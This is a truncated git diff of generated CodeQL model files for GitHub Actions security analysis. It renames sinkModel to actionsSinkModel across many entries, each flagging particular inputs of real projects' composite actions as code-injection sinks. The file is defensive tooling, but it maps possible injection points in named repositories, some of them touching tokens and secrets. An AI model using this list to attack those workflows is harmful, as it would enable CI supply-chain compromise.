a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 4bf92a251235..b03d23918825 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 79c13504faba..9db70f02db4e 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 45ac61c8ef9d..8cea15ac9e11 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index ce546fceb4bb..766ec5155517 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index b34c6d46da3a..13ee2f4e7a87 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index f87e0c02529c..0cf05c2273bd 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 88348f05cd0d..7f2622feecd8 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 76fe3bed4729..3aa8c3bc6495 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index bf1a498d7a08..b79317db9c8a 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index b985d87f7e19..843e0d20b98a 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 8e7cdd0308c9..2a0fd3ac371d 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index cf30d0d19ccc..3ef29cc9b84f 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 5414a755179c..71d2012eb029 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index 97a3bfa026e1..a67aeb905958 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 81672e855578..1f5dd108f910 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index b4fdfaf273df..ea4a2a2a3c76 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 6f1043073d8e..29973ccdbd74 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index f9244c448580..2db70ffea663 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 36332c5678d4..8a4273e8cafd 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index c246e5de06f6..de09b35f1d46 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 13c0093fe4ac..91e6268e6140 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 49b226de1e80..777212d9a0a6 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 9a6e0b88ba2c..8cc0ab83a420 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 4f88855a5616..f1244bdd5dec 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 5683d28567f4..37814510c8c4 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 424c7241bcfc..48e40c36beaa 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 37295f2cf6c0..0edb2c5f8cdc 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index e7c767d2dce1..61210d17abb9 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 7f78690f6396..22dc1a406293 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index ba1beace1704..b2888b571a8a 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index 63085c045d0a..bc188d91f1bb 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d6ee6c8bb7d2..d5defe67401e 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 83951f43c635..d97fedbed130 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 397ab0838090..e22c29b09f11 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 023abac3631d..7203bb8345c6 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 5dd069df4990..dcfbb0ea2032 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 1a1d763d6e4a..6c5d6edd572c 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index a8e95d304576..fdaee61066ed 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 52d085ee4798..d68c4e57c8ad 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 33c56a67cb9b..85a8d2f4d65d 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 258101eecea4..d22754092787 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index d77e05c680bc..4dc0b87214b3 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index db98f8d769af..ea1a8a8afecb 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 7607840dbdc7..5ce00c29e52b 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 2fa4f8dfa618..d1f551b66da3 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 80725157e338..6f8845ec1c0a 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 9d317f14272c..152fdfed4477 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 12deff387bdc..5919ade7e819 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 9c3c242b1ed9..d9afa5bb21fe 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 4aa1ce5c4cf9..0b36853a8914 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ 